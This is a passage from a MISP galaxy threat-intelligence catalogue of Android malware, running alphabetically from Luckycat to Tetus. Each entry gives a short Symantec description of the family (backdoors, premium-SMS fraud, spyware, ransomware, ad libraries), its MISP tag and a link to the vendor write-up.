Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-072806-2905-99

Luckycat

Luckycat is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="Luckycat"

Table 285. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080617-5343-99

Machinleak

Machinleak is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Machinleak"

Table 286. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-120311-2440-99

Maistealer

Maistealer is a Trojan that steals information from Android devices.

The tag is: misp-galaxy:android="Maistealer"

Table 287. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-072411-4350-99

Malapp

Malapp is a generic detection for many individual but varied threats on Android devices that share similar characteristics.

The tag is: misp-galaxy:android="Malapp"

Table 288. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-073014-3354-99

Malebook

Malebook is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malebook"

Table 289. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071206-3403-99

Malhome

Malhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Malhome"

Table 290. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071118-0441-99

Malminer

Malminer is a Trojan horse for Android devices that mines cryptocurrencies on the compromised device.

The tag is: misp-galaxy:android="Malminer"

Table 291. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032712-3709-99

Mania

Mania is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Mania"

Table 292. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070623-1520-99

Maxit

Maxit is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals certain information and uploads it to a remote location.

The tag is: misp-galaxy:android="Maxit"

Table 293. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-120411-2511-99

MdotM

MdotM is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MdotM"

Table 294. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5824-99

Medialets

Medialets is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Medialets"

Table 295. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-5222-99

Meshidden

Meshidden is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Meshidden"

Table 296. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031913-5257-99

Mesploit

Mesploit is a tool for Android devices used to create applications that exploit the Android Fake ID vulnerability.

The tag is: misp-galaxy:android="Mesploit"

Table 297. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032014-2847-99

Mesprank

Mesprank is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Mesprank"

Table 298. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030717-1933-99

Meswatcherbox

Meswatcherbox is a spyware application for Android devices that forwards SMS messages without the user knowing.

The tag is: misp-galaxy:android="Meswatcherbox"

Table 299. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-2736-99

Miji

Miji is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Miji"

Table 300. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4720-99

Milipnot

Milipnot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Milipnot"

Table 301. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-070414-0941-99

MillennialMedia

MillennialMedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MillennialMedia"

Table 302. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4602-99

Mitcad

Mitcad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mitcad"

Table 303. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040212-0528-99

MobClix

MobClix is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobClix"

Table 304. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-4011-99

MobFox

MobFox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobFox"

Table 305. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-3050-99

Mobidisplay

Mobidisplay is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobidisplay"

Table 306. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-0435-99

Mobigapp

Mobigapp is a Trojan horse for Android devices that downloads applications disguised as system updates.

The tag is: misp-galaxy:android="Mobigapp"

Table 307. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062520-5802-99

MobileBackup

MobileBackup is a spyware application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="MobileBackup"

Table 308. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-0040-99

Mobilespy

Mobilespy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Mobilespy"

Table 309. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071512-0653-99

Mobiletx

Mobiletx is a Trojan horse for Android devices that steals information from the compromised device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Mobiletx"

Table 310. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-052807-4439-99

Mobinaspy

Mobinaspy is a spyware application for Android devices that can track the device’s location.

The tag is: misp-galaxy:android="Mobinaspy"

Table 311. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-0511-99

Mobus

Mobus is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mobus"

Table 312. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2006-99

MobWin

MobWin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MobWin"

Table 313. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1522-99

Mocore

Mocore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Mocore"

Table 314. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-092112-4603-99

Moghava

Moghava is a Trojan horse for Android devices that modifies images that are stored on the device.

The tag is: misp-galaxy:android="Moghava"

Table 315. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022712-2822-99

Momark

Momark is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Momark"

Table 316. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-5529-99

Monitorello

Monitorello is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Monitorello"

Table 317. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-4737-99

Moolah

Moolah is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Moolah"

Table 318. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-1007-99

MoPub

MoPub is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="MoPub"

Table 319. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-2456-99

Morepaks

Morepaks is a Trojan horse for Android devices that downloads remote files and may display advertisements on the compromised device.

The tag is: misp-galaxy:android="Morepaks"

Table 320. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071204-1130-99

Nandrobox

Nandrobox is a Trojan horse for Android devices that steals information from the compromised device. It also deletes certain SMS messages from the device.

The tag is: misp-galaxy:android="Nandrobox"

Table 321. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070212-2132-99

Netisend

Netisend is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Netisend"

Table 322. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-080207-1139-99

Nickispy

Nickispy is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Nickispy"

Table 323. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-072714-3613-99

Notcompatible

Notcompatible is a Trojan horse for Android devices that acts as a proxy.

The tag is: misp-galaxy:android="Notcompatible"

Table 324. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050307-2712-99

Nuhaz

Nuhaz is a Trojan horse for Android devices that may intercept text messages on the compromised device.

The tag is: misp-galaxy:android="Nuhaz"

Table 325. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-3416-99

Nyearleaker

Nyearleaker is a Trojan horse program for Android devices that steals information.

The tag is: misp-galaxy:android="Nyearleaker"

Table 326. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-010514-0844-99

Obad

Obad is a Trojan horse for Android devices that opens a back door, steals information, and downloads files. It also sends SMS messages to premium-rate numbers and spreads malware to Bluetooth-enabled devices.

The tag is: misp-galaxy:android="Obad"

Table 327. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060411-4146-99

Oneclickfraud

Oneclickfraud is a Trojan horse for Android devices that attempts to coerce a user into paying for a pornographic service.

The tag is: misp-galaxy:android="Oneclickfraud"

Table 328. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011205-4412-99

Opfake

Opfake is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers.

The tag is: misp-galaxy:android="Opfake"

Table 329. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-2732-99

Opfake.B

Opfake.B is a Trojan horse for the Android platform that may receive commands from a remote attacker to perform various functions.

The tag is: misp-galaxy:android="Opfake.B"

Table 330. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022406-1309-99

Ozotshielder

Ozotshielder is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Ozotshielder"

Table 331. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-091505-3230-99

Pafloat

Pafloat is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pafloat"

Table 332. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-2015-99

PandaAds

PandaAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="PandaAds"

Table 333. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1959-99

Pandbot

Pandbot is a Trojan horse for Android devices that may download more files onto the device.

The tag is: misp-galaxy:android="Pandbot"

Table 334. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071215-1454-99

Pdaspy

Pdaspy is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Pdaspy"

Table 335. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111612-0749-99

Penetho

Penetho is a hacktool for Android devices that can be used to crack the WiFi password of the router that the device is using.

The tag is: misp-galaxy:android="Penetho"

Table 336. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-100110-3614-99

Perkel

Perkel is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Perkel"

Table 337. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-082811-4213-99

Phimdropper

Phimdropper is a Trojan horse for Android devices that sends and intercepts incoming SMS messages.

The tag is: misp-galaxy:android="Phimdropper"

Table 338. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-021002-2943-99

Phospy

Phospy is a Trojan horse for Android devices that steals confidential information from the compromised device.

The tag is: misp-galaxy:android="Phospy"

Table 339. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060706-4803-99

Piddialer

Piddialer is a Trojan horse for Android devices that dials premium-rate numbers from the compromised device.

The tag is: misp-galaxy:android="Piddialer"

Table 340. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-111020-2247-99

Pikspam

Pikspam is a Trojan horse for Android devices that sends spam SMS messages from the compromised device.

The tag is: misp-galaxy:android="Pikspam"

Table 341. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-121815-0336-99

Pincer

Pincer is a Trojan horse for Android devices that steals confidential information and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pincer"

Table 342. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-052307-3530-99

Pirator

Pirator is a Trojan horse on the Android platform that downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Pirator"

Table 343. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-021609-5740-99

Pjapps

Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.

The tag is: misp-galaxy:android="Pjapps"

Table 344. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-022303-3344-99

Pjapps.B

Pjapps.B is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Pjapps.B"

Table 345. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032014-1624-99

Pletora

Pletora is a is a Trojan horse for Android devices that may lock the compromised device. It then asks the user to pay in order to unlock the device.

The tag is: misp-galaxy:android="Pletora"

Table 346. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061217-4345-99

Poisoncake

Poisoncake is a Trojan horse for Android devices that opens a back door on the compromised device. It may also download potentially malicious files and steal information.

The tag is: misp-galaxy:android="Poisoncake"

Table 347. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-010610-0726-99

Pontiflex

Pontiflex is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Pontiflex"

Table 348. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-0946-99

Positmob

Positmob is a Trojan horse program for Android devices that sends SMS messages to premium rate phone numbers.

The tag is: misp-galaxy:android="Positmob"

Table 349. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111409-1556-99

Premiumtext

Premiumtext is a detection for Trojan horses on the Android platform that send SMS texts to premium-rate numbers. These Trojans will often be repackaged versions of genuine Android software packages, often distributed outside the Android Marketplace.

The tag is: misp-galaxy:android="Premiumtext"

Table 350. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-080213-5308-99

Pris

Pris is a Trojan horse for Android devices that silently downloads a malicious application and attempts to open a back door on the compromised device.

The tag is: misp-galaxy:android="Pris"

Table 351. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061820-5638-99

Qdplugin

Qdplugin is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Qdplugin"

Table 352. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-102510-3330-99

Qicsomos

Qicsomos is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Qicsomos"

Table 353. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011007-2223-99

Qitmo

Qitmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Qitmo"

Table 354. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030716-4923-99

Rabbhome

Rabbhome is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Rabbhome"

Table 355. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-053007-3750-99

Repane

Repane is a Trojan horse for Android devices that steals information and sends SMS messages from the compromised device.

The tag is: misp-galaxy:android="Repane"

Table 356. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-090411-5052-99

Reputation.1

Reputation.1 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.1"

Table 357. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022612-2619-99

Reputation.2

Reputation.2 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.2"

Table 358. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-2629-99

Reputation.3

Reputation.3 is a detection for Android files based on analysis performed by Norton Mobile Insight.

The tag is: misp-galaxy:android="Reputation.3"

Table 359. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-022613-3126-99

RevMob

RevMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="RevMob"

Table 360. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040308-0502-99

Roidsec

Roidsec is a Trojan horse for Android devices that steals confidential information.

The tag is: misp-galaxy:android="Roidsec"

Table 361. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-052022-1227-99

Rootcager

Rootcager is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Rootcager"

Table 362. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-030212-1438-99

Rootnik

Rootnik is a Trojan horse for Android devices that steals information and downloads additional apps.

The tag is: misp-galaxy:android="Rootnik"

Rootnik has relationships with:

  • similar: misp-galaxy:malpedia="Rootnik" with estimative-language:likelihood-probability="likely"

Table 363. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-062710-0328-99

Rufraud

Rufraud is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Rufraud"

Table 364. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121306-2304-99

Rusms

Rusms is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Rusms"

Table 365. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061711-5009-99

Samsapo

Samsapo is a worm for Android devices that spreads by sending SMS messages to all contacts stored on the compromised device. It also opens a back door and downloads files.

The tag is: misp-galaxy:android="Samsapo"

Table 366. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-050111-1908-99

Sandorat

Sandorat is a Trojan horse for Android devices that opens a back door on the compromised device. It also steals information.

The tag is: misp-galaxy:android="Sandorat"

Table 367. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-110720-2146-99

Sberick

Sberick is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sberick"

Table 368. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071014-2146-99

Scartibro

Scartibro is a Trojan horse for Android devices that locks the compromised device and asks the user to pay in order to unlock it.

The tag is: misp-galaxy:android="Scartibro"

Table 369. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-080718-2038-99

Scipiex

Scipiex is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Scipiex"

Table 370. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-100814-4702-99

Selfmite

Selfmite is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite"

Table 371. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-070111-5857-99

Selfmite.B

Selfmite.B is a worm for Android devices that displays ads on the compromised device. It spreads through SMS messages.

The tag is: misp-galaxy:android="Selfmite.B"

Table 372. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101013-4717-99

SellARing

SellARing is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SellARing"

Table 373. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-3157-99

SendDroid

SendDroid is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="SendDroid"

Table 374. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-2111-99

Simhosy

Simhosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Simhosy"

Table 375. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061013-3955-99

Simplocker

Simplocker is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker"

Table 376. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060610-5533-99

Simplocker.B

Simplocker.B is a Trojan horse for Android devices that may encrypt files on the compromised device. It then asks the user to pay in order to decrypt these files.

The tag is: misp-galaxy:android="Simplocker.B"

Table 377. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-072317-1950-99

Skullkey

Skullkey is a Trojan horse for Android devices that gives the attacker remote control of the compromised device to perform malicious activity.

The tag is: misp-galaxy:android="Skullkey"

Table 378. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072322-5422-99

Smaato

Smaato is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Smaato"

Table 379. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052622-1755-99

Smbcheck

Smbcheck is a hacktool for Android devices that can trigger a Server Message Block version 2 (SMBv2) vulnerability and may cause the target computer to crash.

The tag is: misp-galaxy:android="Smbcheck"

Table 380. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-5634-99

Smsblocker

Smsblocker is a generic detection for threats on Android devices that block the transmission of SMS messages.

The tag is: misp-galaxy:android="Smsblocker"

Table 381. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081607-4001-99

Smsbomber

Smsbomber is a program that can be used to send messages to contacts on the device.

The tag is: misp-galaxy:android="Smsbomber"

Table 382. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-112611-5837-99

Smslink is a Trojan horse for Android devices that may send malicious SMS messages from the compromised device. It may also display advertisements.

The tag is: misp-galaxy:android="Smslink"

Table 383. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-112600-3035-99

Smspacem

Smspacem is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="Smspacem"

Table 384. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-052310-1322-99

SMSReplicator

SMSReplicator is a spying utility that will secretly transmit incoming SMS messages to another phone of the installer’s choice.

The tag is: misp-galaxy:android="SMSReplicator"

Table 385. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-110214-1252-99

Smssniffer

Smssniffer is a Trojan horse that intercepts SMS messages on Android devices.

The tag is: misp-galaxy:android="Smssniffer"

Table 386. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071108-3626-99

Smsstealer

Smsstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smsstealer"

Table 387. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121514-0214-99

Smstibook

Smstibook is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Smstibook"

Table 388. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-051207-4833-99

Smszombie

Smszombie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Smszombie"

Table 389. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082011-0922-99

Snadapps

Snadapps is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Snadapps"

Table 390. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071807-3111-99

Sockbot

Sockbot is a Trojan horse for Android devices that creates a SOCKS proxy on the compromised device.

The tag is: misp-galaxy:android="Sockbot"

Table 391. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-101314-1353-99

Sockrat

Sockrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Sockrat"

Sockrat has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 392. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-110509-4646-99

Sofacy

Sofacy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sofacy"

Sofacy has relationships with:

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

Table 393. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-010508-5201-99

Sosceo

Sosceo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Sosceo"

Table 394. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040408-0609-99

Spitmo

Spitmo is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Spitmo"

Table 395. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-091407-1435-99

Spitmo.B

Spitmo.B is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spitmo.B"

Table 396. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-0445-99

Spyagent

Spyagent is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Spyagent"

Table 397. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090710-1836-99

Spybubble

Spybubble is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Spybubble"

Table 398. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121917-0335-99

Spydafon

Spydafon is a Potentially Unwanted Application for Android devices that monitors the affected device.

The tag is: misp-galaxy:android="Spydafon"

Table 399. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030722-4740-99

Spymple

Spymple is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Spymple"

Table 400. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-5403-99

Spyoo

Spyoo is a spyware program for Android devices that records and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spyoo"

Table 401. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081709-0457-99

Spytekcell

Spytekcell is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytekcell"

Table 402. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121021-0730-99

Spytrack

Spytrack is a spyware program for Android devices that periodically sends certain information to a remote location.

The tag is: misp-galaxy:android="Spytrack"

Table 403. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080109-5710-99

Spywaller

Spywaller is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Spywaller"

Table 404. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-121807-0203-99

Stealthgenie

Stealthgenie is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Stealthgenie"

Table 405. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-111416-1306-99

Steek

Steek is a potentially unwanted application that is placed on a download website for Android applications and disguised as popular applications.

The tag is: misp-galaxy:android="Steek"

Table 406. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-010911-3142-99

Stels

Stels is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Stels"

Table 407. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-032910-0254-99

Stiniter

Stiniter is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Stiniter"

Table 408. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-030903-5228-99

Sumzand

Sumzand is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Sumzand"

Table 409. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080308-2851-99

Sysecsms

Sysecsms is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Sysecsms"

Table 410. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-122714-5228-99

Tanci

Tanci is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tanci"

Table 411. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-4108-99

Tapjoy

Tapjoy is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tapjoy"

Table 412. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-4702-99

Tapsnake

Tapsnake is a Trojan horse for Android phones that is embedded into a game. It tracks the phone’s location and posts it to a remote web service.

The tag is: misp-galaxy:android="Tapsnake"

Table 413. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-081214-2657-99

Tascudap

Tascudap is a Trojan horse for Android devices that uses the compromised device in denial of service attacks.

The tag is: misp-galaxy:android="Tascudap"

Table 414. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-121312-4547-99

Teelog

Teelog is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Teelog"

Table 415. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040215-2736-99

Temai

Temai is a Trojan horse for Android applications that opens a back door and downloads malicious files onto the compromised device.

The tag is: misp-galaxy:android="Temai"

Table 416. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091722-4052-99

Tetus

